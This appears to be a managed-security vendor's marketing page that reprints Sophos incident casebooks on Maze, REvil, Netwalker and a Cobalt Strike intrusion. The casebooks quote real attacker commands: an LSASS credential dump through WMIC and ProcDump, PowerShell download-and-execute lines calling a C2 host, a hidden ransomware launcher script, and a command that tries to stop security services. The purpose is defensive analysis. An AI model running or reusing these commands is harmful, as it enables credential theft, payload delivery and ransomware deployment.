Human led cyber attacks require human led threat hunting

Let's take a proactive approach to incident response together. 24/7 Threat hunting, detection, and response delivered by an expert team as a fully-managed service.

A picture to represent Spear Shield cybersecurity services in Ipswich, Suffolk

Attacks are up and their complexity and impact are increasing

Stories of organisations crippled by ransomware regularly dominate the IT news headlines, and accounts of six-and seven-figure ransom demands are commonplace. But, do the news stories tell the full story?

To understand the reality behind the headlines, Spear Shield's partner Sophos commissioned an independent survey of 5,000 IT managers across 26 countries. Please find an insight into the findings below:

  • Ransomware hit-rate

  • Ransomware cost of recovery

  • Extortion tactics

  • Threat Discovery

66% of organisations were hit by ransomware in the last year, up from 27% in 2020.

This is a 78% increase over the course of a year, demonstrating that adversaries have become considerably more capable at executing the most significant attacks at scale. This likely also reflects the growing success of the Ransomware-as-a-Service model which significantly extends the reach of ransomware by reducing the skill level required to deploy an attack.

Threefold increase in the proportion of victims paying ransoms of £1 million or more: up from 4% in 2020 to 11% in 2021.

In parallel, the percentage paying less than £10,000 dropped from one in three (34%) in 2020 to one in five (21%) in 2021.

Overall, the average ransom payment came in at £812,360, a 4.8X increase from the 2020 average of £170K (based on 282 respondents).

Ransomware operators do not just target systems and data, they target people.

Below are the top 10 pressure tactics that adversaries used in 2021:

1. Stealing data and threatening to publish or auction it online
2. Emailing and calling employees, including senior executives, threatening to reveal their personal information
3. Notifying or threatening to notify business partners, customers, the media, and more of the data breach
4. Silencing victims
5. Recruiting insiders
6. Resetting passwords
7. Phishing attacks targeting victim email accounts
8. Deleting online backups and shadow volume copies
9. Printing physical copies of the ransom note on all connected devices, including point of sale terminals
10. Launching distributed denial-of-service attacks against the target's website

17% of threats are in an organisation for an unknown amount of time before being discovered.

Cyber-attacks are multi-staged, co-ordinated and the norm. e.g a phishing email could install malicious code that takes advantage of a software vulnerability to install ransomware or steal your credentials.

a picture to represent Spear Shield MDR Services

Gartner predicts by 2025 that 50% of organisations will be using MDR Services.

Your pain? We understand.

Few organisations have the right tools, people, and processes in-house to effectively manage their security programme around-the-clock whilst proactively defending against new and emerging threats.

As a result, organisations are increasingly looking towards managed detection and response (MDR) services to run their security operations programme.


Time, Resource & Visibility Challenges

The demands from a business on the IT and Security Teams is heavy. Finding time to spend managing your cyber security can be difficult and IT Teams commonly feel that budget for both people and technology is too low. Stretched internal resource and not having the right tool-set can increase the time it takes to be able to detect an active threat or data breach to your business. The industry average time to be able to identify a data breach is one month or longer.


Lack of time


Lack of resources


Lack of visibility


Building an effective SecOps strategy with Spear Shield

A picture to represent Spear Shield's SecOps strategy

In today's ever evolving threat landscape, modern cybersecurity programmes require the combination of three core capabilities: Protection, Detection, and Response.

Which option is best suited for my organisation?

Protection only does what it says on the tin.

XDR stands for Extended Detection Response. XDR is used to hunt the latent or missed threats and respond to them. But, somebody has to managed XDR...

MTR stands for Managed Threat Response. Commonly known in the industry as MDR (Managed Detection Response) and will provide your organisation with 24/7 365 lead-less threat hunting.

Rapid Response is a dedicated incident response service for 'in an emergency, please break glass' P1/P2 type scenarios.

a picture to show which managed detection response is best suited for my organisation

Did you know... 48% of organisations already incorporate human-led threat hunts and the other 48% plan to incorporate human-led threats within the next year?


Managed Threat Response Team & Service Overview

The MTR Ops team is made up of security professionals: analysts, engineers, ethical hackers, data scientists, specialists, and inventors. Backgrounds include armed forces, law enforcement, intelligence, public and private enterprise.

High-Fidelity Detections

Going beyond traditional detections, the MTR service combines deterministic and machine learning models to spot suspicious behaviours and the tactics, techniques and procedures used by the most advanced adversaries.

Proactive Defence

Combining threat intelligence with newly-discovered Indicators of Compromise (IoC) and Indicators of Attack (IoA) that are identified through analyst-led threat hunts, to proactively protect your environment.

Transparency and Control

You own the decisions and control how and when potential incidents are escalated, what response actions (if any) you want the MTR service to take and who should be included in communications.

A Proactive Approach to Incident Response

Every second counts during an attack. When an incident is confirmed, a dedicated threat response lead is provided to directly work with your internal resource until the active threat is neutralised.

Weekly/Monthly Activity Reporting

Provide assurance to your organisation with weekly and monthly activity reporting. Exec-level ready reports mapped to the MITRE ATT&CK Framework.

24/7 Leadless Threat Hunting

Applying data science, threat intelligence, and the intuition of veteran threat hunters, we combine your company profile, high-value assets, and high-risk users to anticipate attacker behaviour and identify new Indicators of Attack (IoA).

“Winner: Best Managed Security Services Offering.”

a picture to show Spear Shields MDR services methodology in Ipswich, Suffolk

The investigative framework process follows the iterative nature of the OODA Loop (Observe, Orient, Decide, Act.)

a picture to show Spear Shield, Ipswich Suffolks cybersecurity MDR service in action

What would the MTR Service look like in action?

To illustrate the range of the MTR Service when it comes to Threat Detection and Response please find a breakdown split into x3 key scenerarios.


Gaining that extra member in your team

Fully interchangeable response modes all included at no additional cost. Decide the best way for the MTR Ops team to work alongside you. 



We notify you about the detection and provide details to help you with prioritisation and response.



We work with your internal team or external point(s) of contact to respond to the detection.



We handle containment and neutralisation actions and inform you of the action(s) taken.

Real-world profilic attacks, crushed!

Blocking a $15 million Maze ransomware attack

A real-world story from the Sophos Managed Threat Response team
Written by 

Customer profile: An organization with many hundreds of networked devices based in Asia Pacific.

The Sophos Managed Threat Response (MTR) team was called in to help an organization targeted with Maze ransomware. The attackers issued a ransom demand for US$15 million – if they had succeeded this would have been one of the most expense ransomware payments to date.

Background: Ransomware partners in crime

 Maze is one of the most notorious ransomware families, active since 2019 when it evolved from ChaCha ransomware. It was among the first to combine data encryption with information theft.

The operators behind Maze have recently started colluding with other ransomware groups, including LockBit, SunCrypt and Ragnar Locker, providing them with access to their platform for posting stolen victim data.

This appears to have led to a reciprocal sharing of tactics, techniques and procedures (TTPs): in the attack covered here the Maze group borrowed a Ragnar Locker technique that involves using virtual machines.

For detailed technical analysis of this collaboration between attackers read Maze attackers adopt Ragnar Locker virtual machine technique.

Days 1-3: The attack begins

Prior to the attack becoming active, the operators compromised a computer on the target’s network. This computer was then used as a ‘beach head’ in the network. On multiple occasions during the attack, the attackers connected from here to other computers over Remote Desktop Protocol (RDP).

On day three, the main part of the attack began. The attackers exploited a domain admin account with a weak password to take control of an unprotected Domain Controller (DC). They then spent several days moving across the network.

Using the legitimate network scanning tool Advanced IP Scanner to map the network, the attackers created lists of IP addresses to which they would later deploy ransomware. These included a list of the IP addresses of machines belonging to the target’s IT administrators.

The attackers’ attention then turned to the exfiltration of data.

They identified a file server and accessed it remotely over RDP using the compromised domain admin account. Using the legitimate archiving tools WinRar and 7zip, they started compressing folders located on it.

These archives were then copied back to the primary DC using the legitimate Total Commander FTP client that the attackers had installed on the file server.

The attackers tried to install the cloud storage application Mega on the DC. This was blocked as the target had added Mega to their blocked list using the application control capability in Sophos Intercept X endpoint protection. The attackers then switched to using the web-based version instead, uploading the compressed files.

Days 4-5: The calm before the storm

For two days, the attackers went quiet. It’s likely they were waiting for a day when the target’s IT security team wouldn’t be working, like the weekend.

Day 6: The first ransomware attack is launched

The first Maze ransomware attack was launched on a Sunday, using the already compromised domain admin account and the lists of IP addresses that had been identified.

This first attack actually comprised three attacks as the operators deployed three copies of the Maze ransomware via batch scripts to the targeted computers:

  • C:\ProgramData\enc6.exe
  • C:\ProgramData\enc.exe
  • C:\ProgramData\network.dll

Three scheduled tasks were created to execute the ransomware:

 Name Command
 Windows Update Security Patches C:\ProgramData\enc6.exe
Windows Update Security Patches 5 C:\ProgramData\enc.exe
 Windows Update Security regsvr32.exe /i c:\programdata\network.dll


Over 700 computers were targeted in the attack, which was detected and blocked by Sophos Intercept X.

Either the attackers didn’t realize the attack had been blocked or they were hoping that the theft of the data would be enough for the target to pay up – but whatever the reason, upon launching the first attack attempt they issued a ransom demand for US$ 15 million.

Day 7: The MTR team gets to work

Realizing that they were under attack, the target’s security team engaged the advanced incident response skills of the Sophos MTR team. Since they were not yet a Sophos MTR customer, the Sophos Rapid Response team was first engaged. The team quickly identified the compromised admin account, identified and removed several malicious files, and blocked attacker commands and C2 (command and control) communications.

Day 8: Investigation and neutralization continue

Over the following hours the MTR team found further tools and techniques used by the attackers, as well as evidence relating to the exfiltration of data. More files and accounts were blocked.

Day 9: The second attack

The attackers launched a second attack via a different compromised account. This attack was similar to the first one: commands were executed on a DC, looping through the lists of IP addresses contained in txt files.

However, this time they coped a file called license.exe to C:\ProgramData:

This was followed by a scheduled task to execute it. In this attack attempt the task was called “Google Chrome Security Update”:

The attack was quickly identified and stopped. Intercept X detected the ransomware, and the MTR team disabled and deleted both the compromised account and the license.exe file. No files were encrypted.

Day 9: Third time lucky?

Just a few hours after the second attempt, the attackers tried again.

By now they seemed to be growing desperate. This attack targeted a single machine, the main file server that the exfiltrated data had been taken from, and used a completely different technique to the previous attacks.

In the third attempt, the attackers distributed the ransomware payload inside a virtual machine (VM).

Fortunately the MTR investigators recognized this new approach immediately as they had also responded to the Ragnar Locker ransomware attack where the technique was first seen.

The Maze operators had enhanced the technique, but it was undoubtedly the same. The attack was detected and stopped and no files were encrypted.

 Defeating adversaries in human-led attacks

This casebook highlights how agile and adaptable human-operated attacks can be, with the attackers able to quickly substitute and reconfigure tools and return to the ring for another round.  It also demonstrates how, to minimize likelihood of detection, attackers take advantage of multiple legitimate IT tools in their attacks.

Sophos endpoint products detect components of this attack as Troj/Ransom-GAV or Troj/Swrort-EG. Indicators of compromise can be found on the SophosLabs Github.

What can defenders do?

The most important things an IT security team can do is to reduce the attack surface, implement strong security software, including specialist anti-ransomware security, educate employees, and consider setting up or engaging a human threat hunting service to spot the clues that software can’t.

Any organization can be a ransomware target, and any spam or phishing email, exposed RDP port, vulnerable exploitable gateway device or stolen remote access credentials will be enough for such adversaries to gain a foothold.


 The MITRE ATT&CK framework is a globally accessible knowledge base of known adversary tactics, techniques and procedures (TTPs).  It can help security teams as well as threat hunters and analysts to better understand, anticipate and mitigate attacker behavior.

Initial Access

  • T1078.002 – Valid Accounts: Domain Accounts
  • T1133 – External Remote Services


  • T1059.001 – Command & Scripting Interrupter: PowerShell
  • T1059.003 – Command and Scripting Interpreter: Windows Command Shell
  • T1047 – Windows Management Instrumentation
  • T1053.005 – Scheduled Task/Job: Scheduled Task

Defense Evasion

  • T1564.006 – Hide Artifacts: Run Virtual Instance

Credential Access


  • T1016 – System Network Configuration Discovery

Lateral Movement

  • T1021.001 – Remote Services: Remote Desktop Protocol
  • T1021.002 – Remote Services: SMB/Windows Admin Shares

Command & Control

  • T1071.001 – Application Layer Protocol: Web Protocols


  • T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage


  • T1486 – Data Encrypted for Impact

Sophos Managed Threat Response and threat hunting

For more information on the Sophos MTR service, speak with one of the security experts at Spear Shield today.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Speak with the team at Spear Shield to start a 30-day no obligation trial today.

Hand-to-hand combat with REvil ransomware chasing a $2.5 million pay day

For four hours defenders were locked in live combat with the human adversaries orchestrating the attack.
Written by 

A few weeks ago, a mid-sized, 24/7 media company that had moved critical activities online during the pandemic, found itself locked in live combat with REvil ransomware attackers determined to secure a multi-million-dollar pay-out. The attack failed, but the company has yet to fully recover.

In early June 2021, a detection of Cobalt Strike on the network of a mid-size media company triggered a security alert. Cobalt Strike is a remote access agent that is widely used by adversaries as a precursor to ransomware attack.

Attackers released ransomware a few hours later at 4 am local time. For the next four hours, the target’s IT team and Sophos’ Rapid Response team were locked in live combat with the human adversaries orchestrating the attack.

The attack ultimately failed, but not before the attackers encrypted the data on unprotected devices, deleted online backups, and decimated one online and undefended domain.

The ransom note left on encrypted devices demanded a payment of $2.5 million and was signed by REvil, also known as Sodinokibi.

How it began

REvil is a ransomware-as-a-service offering, which means that criminal customers can lease the malware from the developers and then use their own tools and resources to target and perform the attack. The target for this particular REvil customer was a media company with approximately 600 computing devices – 25 of them servers – and three Active Directory domains, which were critical to the company’s ability to maintain its 24/7 operations.

The rush to remote and online operations

Like so many organizations during the early stages of the COVID-19 pandemic, the target had rushed to equip and enable a remote workforce, and not all devices carried the same level of protection. The company also decided to internet-connect a network that was previously air-gapped. Unfortunately, these actions would come back to bite them.

Once the intruders were inside the network, they made straight for the unprotected devices and other online systems they could gain access to, installing their attack tools and using them to spread the attack to other devices.

The unfolding attack

When Sophos’ Rapid Response team arrived on the scene, they discovered that the attackers had already managed to compromise a number of accounts and had been able to move unimpeded between unprotected computers.

“One of the biggest challenges for incident response is a lack of visibility about what’s happening on unprotected devices,” said Paul Jacobs, incident response lead, Sophos. “We can see and block inbound attacks coming from these devices to a protected endpoint, but we can’t centrally remove the intruder from those devices or see what they’re up to.”

The team also looked at the software applications installed on devices to check for any that might be used as part of the attack.

“As a result of the pandemic, it’s not unusual to find remote access applications installed on employee devices,” said Jacobs. “When we saw Screen Connect on 130 endpoints, we assumed it was there intentionally to support people working from home. It turned out the company knew nothing about it – the attackers had installed the software to ensure they could maintain access to the network and compromised devices.”

This was just one of several mechanisms the attackers implemented to maintain persistence. The attackers also created their own domain admin account as a fallback after stealing another set of domain admin credentials.

Hand-to-hand combat

“As the attack became noisier, the attackers knew they would be detected and blocked. We could tell that they knew we were there, and they were doing everything they could to defeat us,” said Jacobs. “Our security products have a behavioral feature called CryptoGuard that detects and blocks attempts to encrypt files even if the source is a remote, unprotected device. Once we started to see such detections, we knew the ransomware had been unleashed and the battle was on.”

The attackers tried repeatedly to breach protected devices and encrypt files, launching attacks from different unprotected devices they had been able to compromise.

Every attempt needed to be blocked and investigated to ensure there was nothing else going on and that there was no further damage – even though by then the next attack attempt was already underway. This task was made harder than normal because the organization needed to keep most of its servers online to support the 24/7 broadcasting systems.

Eventually, the onslaught began to slow down. By day two, inbound attacks were still detected intermittently but it was clear the main attack attempt was over and had failed.

The aftermath

As the incident responders and the company’s IT security team took stock, they found that damage was mainly limited to the unprotected devices and domains. The previously air-gapped, online domain was completely destroyed and needed to be rebuilt and online backups had been deleted, but the company wasn’t totally crippled by the attack, and it didn’t need to pay the exorbitant ransom. Despite this, the return to full operations has been a slow process and is ongoing at the time of publication.

The lessons learned

“In most cases, by the time we are called in the attack has already taken place, and we are there to help contain, neutralize and investigate the aftermath,” said Peter Mackenzie, manager of Sophos Rapid Response. “On this occasion we were there as the final stage of the attack unfolded and could see at first hand the determination and growing frustration of the attackers, who threw everything at us, from as many directions as they could.”

Sophos experts believe there are two important lessons defenders can take away from this incident:

  1. The first is about risk management. When you make changes to your environment, for example, changing a network from air-gapped to online as in the case of this business, your level of risk changes. New areas of vulnerability open up and IT security teams need to understand and address that
  2. The second is about preserving data. The first compromised account in this attack belonged to one of the IT team. All the data had been wiped and this meant that valuable information, such as details of the original breach, which could have been used for forensic analysis and investigation was lost. The more information is kept intact, the easier it is to see what happened and to ensure it can’t happen again


Sophos recommends the following best practices to help defend against REvil and other families of ransomware and related cyber-attacks:

  1. Monitor and respond to alerts – Ensure the appropriate tools, processes, and resources (people) are available to monitor, investigate and respond to threats seen in the environment. Ransomware attackers often time their strike during off-peak hours, at weekends or during the holidays, on the assumption that few or no staff are watching
  2. Set and enforce strong passwords – Strong passwords serve as one of the first lines of defense. Passwords should be unique or complex and never re-used. This is easier to do if you provide staff with a password manager that can store their credentials
  3. Multi Factor Authentication (MFA) – Even strong passwords can be compromised. Any form of multifactor authentication is better than none for securing access to critical resources such as e-mail, remote management tools, and network assets
  4. Lock down accessible services – Perform scans of your organization’s network from the outside and identify and lock down the ports commonly used by VNC, RDP, or other remote access tools. If a machine needs to be reachable using a remote management tool, put that tool behind a VPN or zero-trust network access solution that uses MFA as part of its login
  5. Segmentation and Zero-Trust – Separate critical servers from each other and from workstations by putting them into separate VLANs as you work towards a zero-trust network model
  6. Make offline backups of information and applications, keep them up to date and keep a copy offline
  7. Inventory your assets and accounts – Unprotected and unpatched devices in the network increase risk and create a situation where malicious activities could pass unnoticed. It is vital to have a current inventory of all connected computers and IOT devices. Use network scans and physical checks to locate and catalog them
  8. Install layered protection to block attackers at as many points as possible – and extend that security to all endpoints that you allow onto your network
  9. Product configuration – Under-protected systems and devices are vulnerable too. It is important that you ensure security solutions are configured properly and to check and, where necessary, update security policies regularly. New security features are not always enabled automatically
  10. Active Directory (AD) – Conduct regular audits on all accounts in AD, ensuring that none have more access than is needed for their purpose. Disable accounts for departing employees as soon as they leave the company
  11. Patch everything – Keep Windows and other software up to date. This also means double checking that patches have been installed correctly and, in particular, are in place for critical systems like internet-facing machines or domain controllers

Additional advice for security leadership

  1. Understand the tactics, techniques and procedures (TTPs) that attackers can use and how to spot the early warning signs of an imminent attack
  2. Have an incident response plan that is continuously reviewed and updated to reflect changes in your IT environment and business operations and how they impact your security posture and level of risk
  3. Turn to external support if you don’t have the resources or expertise in house to monitor activity on the network or respond to an incident. Ransomware is often unleashed at the end of attack, so you need both dedicated anti-ransomware technology and human-led threat hunting to detect the tell-tale tactics, techniques, and procedures that indicate an attacker is in or attempting to get into the environment
  4. If you do get hit, there are incident response experts available 24/7 you can call on to contain and neutralize the attack

Technical information on the tactics, techniques and procedures (TTPs) used in this and other REvil attacks can be found in the following companion articles, What to Expect When You’ve Been Hit with REvil Ransomware, and Relentless REvil, Revealed: RaaS as Variable as the Criminals Who Use It.

An active adversary caught in the act

MTR Casebook: An active adversary caught in the act

A real-world story from the Sophos Managed Threat Response team
Written by 

Customer profile: A professional sports organization based in the USA, with approximately 800 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service.

The initial clue: A needle among the hay

In the hunt for suspicious events, the Sophos MTR team analyzes tens of millions of data points each day by leveraging threat intelligence, machine learning, and complex rule sets derived from the front-line experience that operators have gained from responding to threats day in, day out.

This analysis is done with the goal of finding signals that could potentially be an indicator of an attack. You can learn more about our Threat Detection and Response methodology in this blog post.

In this case, the signal was of a legitimate Microsoft’s Sysinternals tool. ProcDump.exe – a tool typically used by developers to analyze running software processes and to write (or ‘dump’) their memory to disk so that it can be inspected. Developers find this tool very handy for figuring out why a bug is occurring.

Yet in this instance, ProcDump was attempting to export the memory space of lsass.exe. This raised alarm bells with the Sophos MTR operations team which monitors the customer environment 24/7.

LSASS is the Local Security Authority Subsystem Service in Microsoft Windows and it is responsible for enforcing security policy and handling logins to Windows systems. If one were to write its memory to disk, the usernames and passwords of users could be retrieved from it.

The Sophos MTR team had indeed spotted an indicator of attack. Someone was trying to steal credentials.

You may have heard of Mimikatz, a tool whose sole purpose is for stealing passwords, hashes, security tokens, and so on. Adversaries sometimes avoid using this tool given its widespread detection by security products. But unlike Mimikatz, ProcDump has legitimate uses beyond just the nefarious, and thus is rarely detected by security vendors.

Someone was trying to not get caught.

The investigation begins

A case was created the same minute as the signal was generated, and a Sophos MTR operator immediately began to investigate.

Attempted credential theft

The operator looked into the historic data gathered by our agent and found the process that caused the detection. The process was trying to invoke a command:

C:\Windows\system32\cmd.exe /C wmic /node:"SERVER NAME" process call create "C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp"

The command shows the Windows command-line interpreter cmd.exe attempting to use WMIC – the interface for Windows Management Instrumentation. WMI is a tool for interacting with local and remote systems to get information and send them instructions.

Calling out to a remote server (redacted to SERVER NAME), the command was trying to tell the server to run ProcDump and write the LSASS process’ memory to disk.

Thankfully the MTR operator found no evidence that “lsass.dmp” was written to disk, and a review of their Sophos Central telemetry showed Sophos credential theft prevention technology successfully thwarted the adversary’s attempt.

But where did this command come from?

Attempted privilege escalation

The operator looked back up the process tree to find the parent of (i.e. what started) cmd.exe and found svchost.exe – the Windows Service Host that is used to run single processes and conserve computing resources.

The same instance of svchost also spawned another child process:

C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7

To the untrained eye, the above command doesn’t appear obviously malicious. Yet this is a common artifact that can be observed from the GetSystem function of Meterpreter.

The Meterpreter is a payload that gives an adversary interactive command-line access to a host and GetSystem is a script built into the Meterpreter that aids an adversary in gaining full system privileges by impersonating a named pipe – a technology to enable processes to communicate with one another.

Thankfully the named pipe they were trying to exploit didn’t exist on the system at that time.

Command and control

With the knowledge that the adversary was using the Meterpreter, this would indicate they must have some kind of network connection to remotely send their commands to the compromised host.

Digging into the network logs, the MTR operator could see a large number of outbound connections to Bulgarian IP address using the network port 443.

Port 443 is typically used by HTTPS for securely connecting to websites, and adversaries commonly use this port to hide themselves among legitimate web traffic.

This discovery initiated a review of this Bulgarian-based IP. One of the ports it had open to the internet is port 50050. This port is an ephemeral port – one that cannot be registered with IANA and thus is not a common port used by well-known network services. However, the MTR operator had seen this port many times before.

Port 50050 is the default listening port for a Cobalt Strike listening server. Cobalt Strike is a “threat emulation” tool typically marketed to penetration testers to easily facilitate adversarial attacks and help organizations see their risk to breaches.

However, malicious threat actors have gotten their hands on this tool and use it orchestrate real attacks on innocent victims.

Notifying the customer

Only minutes after the initial detection was made, the MTR operator completed the initial investigation and had high confidence that this was malicious adversarial activity.

Sophos MTR offers three modes of response to customers that they can switch between at any time:

Notify –Sophos conducts threat identification and investigation, informing the customer of the findings and offering the customer recommendations for how to respond to the threat themselves.

Collaborate – Sophos conducts threat identification and investigation, and collaborates on the response to the threat, dividing responsibility between the customer and the Sophos MTR team.

Authorize – Sophos conducts threat identification, investigation, and response and takes proactive action, informing the customer about what was detected and the response actions that were taken.

In this instance, the MTR customer was in Notify mode. The operator reached out to the customer via phone to discuss the discovery and to provide recommendations for how to respond to the immediate findings before the investigation continued.

The MTR operator shared the discoveries and the user accounts leveraged by the adversary. These accounts needed their passwords reset immediately to disable the adversary’s access. In addition to the phone call, all the details were provided in an email to be referenced while the customer took action.

Continuing the hunt

With the customer working on resetting the compromised accounts’ passwords, the MTR operator continued to follow the adversary’s journey across the customer’s network. At this point, no evidence had been found as to how they got inside.

Note that throughout the rest of this case, regular communication between the MTR operator and the customer took place via email.

Lurking in the cloud

Deeper analysis of the network traffic on the compromised host showed HTTPS traffic between the host and another that resided in the customer’s virtual private cloud (VPC), where they have a number of servers that face the public internet.

Diving into the logs of the server in the VPC, the MTR operator quickly spotted further GetSystem attempts and named pipe impersonation. However, all evidence pointed towards the already identified compromised hosts.

Additionally, a PowerShell (a scripting language built into Windows for use with task automation) command execution was identified:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''))"

This one-line command reaches out to a URL and downloads and executes a payload it finds there. The URL points to the same Bulgarian IP where the MTR team found the open ports for Cobalt Strike.


The MTR operator quickly reached out to SophosLabs, Sophos’ threat analysis, intelligence, and research division. Sharing the above command, the MTR operator asked for assistance with analyzing the payload hosted at that URL. Within a few minutes, SophosLabs shared their insights back with Sophos MTR.

Unfortunately, the payload in question was no longer present: seemingly taken down by the adversary shortly after they used it. SophosLabs promptly added the IP and the URL to the cloud intelligence platform that underpins all Sophos products and services so that any further use of that command and control server will be detected and blocked across all Sophos customers.

Finding the initial access

Finally, the MTR operator identified where the attack began. Continuing the analysis of the VPC server’s logs, Remote Desktop Protocol (RDP) communication to an unknown host was spotted within the VPC. This unknown host was not under management by Sophos MTR, nor could it be found in the customer’s Sophos Central account.

The operator reached out to the customer to ask what this unknown host was and why it wasn’t under management.

It seems they decommissioned it too late. The adversary had laterally moved from the original compromised host to another and executed the PowerShell command. This gave them remote access to a new host in the event they lost their access via RDP.

This turned out to be a smart move by the adversary, as this is exactly what happened.

RDP servers far too often face the public internet ,making them a prime target of adversaries looking to break into networks. Once inside, RDP is a noisy and visual method of having remote access. Moving cursors on the screen are somewhat of a giveaway.

The first thing an adversary will look to do is to move laterally, to another host, and install a reverse shell – a way to have that host call back to them and give them command line access. Using the command line is a far more stealthy method of remote access, allowing them to hide in the background even while a user is logged in and using the host.

As to what the adversary’s goals were, these are unknown. The MTR operators identified the attacker long before they were able to action on their objectives, catching them while they were still in the network propagation stages, laterally moving and attempting to escalate their privileges.

Following the investigation, the MTR operators continued to monitor the customer’s estate for this specific threat for seven more days, identifying no further malicious or suspicious activity.

The MTR team then concluded that the adversary had been successfully ejected from the network.

Case closed. On to the next.

Learn more

For more information on the Sophos MTR service, speak with the security experts at Spear Shield.

If you prefer to conduct your own threat hunts, Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Speak with the Spear Shield team if you'd like to start a 30-day no obligation trial today.


ProcDump of LSASS C:\Windows\system32\cmd.exe /C wmic /node:”SERVER NAME” process call create “C:\PerfLogs\procdump.exe -accepteula -ma lsass C:\PerfLogs\lsass.dmp”
Meterpreter GetSystem C:\Windows\system32\cmd.exe /c echo 4d6b1c047b2 > \\.\pipe\8eaee7
C2 IPv4
C2 payload URL
C2 port (Cobalt Strike) 50050
PowerShell to download and invoke Cobalt Strike payload “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘’))”

Installing MTR on the run to keep up with Netwalker

Written by 

A new customer of the Sophos Managed Threat Response (MTR) service delayed their deployment, so when they were unexpectedly hit by a Netwalker ransomware attack, they had to go into SOS mode. Even though Sophos MTR immediately stepped in to neutralize the incident, the investigation into the initial entry points of the attack was hindered by a lack of historical evidence.

Key takeaways:

  • Attackers move fast and visibility is crucial to a swift response. Deploying a managed threat hunting and response service such as MTR quickly after procurement is critical to ensure protection is activated and there are no visibility gaps.
  • Attackers leave traces and trails, and MTR uses both to neutralize and mitigate an active attack and to investigate what security gaps were exploited, in order to help prevent future attacks. Having MTR in place from the start means this evidence can all be collected.
  • Proper deployment of MTR is vital – partners have an important role to play alongside Sophos in helping organizations to do this.

A tough lesson

At 5 a.m. one morning in January 2021, the 24/7 Sophos MTR team received a call from a worried customer who had recently signed up to the service but had not yet been able to activate the licenses. The customer wanted to know the fastest way to deploy MTR because there was an active ransomware attack underway and the organization’s DNS and email were down.

Under normal circumstances, MTR would respond to alerts from Sophos technologies and catch attacks as they begin. Organizations under active attack who are not Sophos or MTR customers would be routed to the Sophos Rapid Response team to stop the attack. In this instance, the customer was targeted by attackers before it deployed its newly acquired Sophos’ MTR service, so there was no MTR monitoring of its servers and endpoints.

After receiving the call, Sophos MTR quickly jumped in to neutralize the active attack. The team worked with the customer to identify and isolate the domain controller being used by the adversaries to launch the attack and limited its access on the network.

The MTR incident lead handling the response then advised the organization to reset all domain admin accounts and block discovered adversary command and control (C2) addresses. Once that was done, the organization quickly deployed MTR across nearly 200 servers and endpoints. This helped to secure the organization from further impact while the MTR team continued its work to identify and block the attack and assess what was done by the intruders.

Some of the systems had Sophos Intercept X Endpoint security installed, so these were protected from the attack. Intercept X’s CryptoGuard technology protects against ransomware attacks, regardless of the ransomware family, by detecting when files are being encrypted and blocking the malicious activity.

The attackers were, however, able to hit unprotected machines with ransomware.

Sophos’ MTR team initially thought the ransomware might be Conti, because one of the C2 addresses found used the “Trevor Forget” profile of DerbyCon lore, also seen in a recent Conti attack, (where a static URI address mimics the name of the restaurant where one of the security researchers attending DerbyCon found in his drink a dead cockroach, which he named Trevor.)


However, this turned out not to be the case. After finding the following command, Sophos MTR was able to locate the ransomware itself:

cmd” /c “(net use b: /delete /y & net use b: \\REDACTED\111 /user:REDACTED\Administrator REDACTED & powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoE xit -File b:\pss.ps1)

The attacker had started by deleting anything that might be mounted at b:\, before mounting a directory from a remote machine using the domain administrator account to do so. Lastly, it ran a PowerShell script dropped into that directory earlier, to grab pss.ps1, the ransomware file.

Also, on the first day of the investigation, MTR identified the command used to download Cobalt Strike prior to the ransomware attack:

cmd.exe /c powershell.exe -nop -w hidden -c “”IEX ((new-object net.webclient).downloadstring(‘https[:]//dennycartos[.]online:443/aooor’

The MTR team passed this information to SophosLabs experts who quickly determined the attack as Netwalker ransomware and created a detection to block the Cobalt Strike download domain for all Sophos customers.

Within three hours of MTR jumping on this incident, Sophos shut down all malicious activity and told the organization it was safe to roll to production again. The unprotected devices that had been encrypted were rebuilt from the organization’s backups.

Additional discoveries

Although MTR wasn’t installed in the early stages of the attack, the team was able to construct some understanding of the events leading up to the attack. Their investigation turned up some of the tools the attackers used, including Angry IP Scanner, which is used by adversaries to map devices on a target network, and Bloodhound, a tool designed to help IT pros discover common Active Directory security issues. The attackers also used Bloodhound to find domain admin accounts by mapping out user trust in Active Directory.

There were also suspicious logins in early January from Russia, Germany, Sweden, and the United States, as well as detections from December for malicious DLLs and software. MTR was unable to recover any of these files and so it is impossible to tell if they belonged to the same adversaries as the ones behind the ransomware attack.

Lastly, Sophos MTR noticed the attackers tried and failed to disable Sophos security on devices using a Windows Management Instrumentation command:

wmic service where “name like ‘sophos%%'” call servicestop

The attackers actually attempted to disable Sophos in this way more than once but were unsuccessful for two reasons. First, the tamper protection in Intercept X monitors and defends Sophos endpoint agents from being disabled, even if the attacker is running as system administrator. Secondly, the attacker had a typo in the command: it should be stopservice not servicestop, so the command wouldn’t have worked anyway.

A strange coda

A few weeks after the Netwalker ransomware attack was discovered and neutralized by the MTR team, the US Department of Justice (DoJ) took its own steps to disrupt Netwalker. On Jan. 27, 2021, the  DoJ announced it was bringing charges against a Canadian national believed to be part of the Netwalker group. The announcement went on to note that on Jan. 10, 2021, DoJ seized more than $400,000 in cryptocurrency paid as ransom in three Netwalker attacks. Lastly, authorities in Bulgaria seized a dark web site used by Netwalker affiliates to provide payment instructions and communicate with victims.

As yet, it is unclear how these DoJ actions will impact Netwalker given that it is a ransomware-as-a-service product licensed by malicious actors from a main group. What is clear is the threat of ransomware is always looming and can strike at any time.

SophosLabs has published a list of indicators of compromise for samples required for its analysis of Netwalker on its Github page.

Netwalker threat actor toolset on the ATT&CK matrix

The ransomware hunt that unearthed a historic banking trojan

A real-world story from the Sophos Managed Threat Response team
Written by 

Customer profile: A non-profit organization based in the USA, with approximately 1,000 devices.

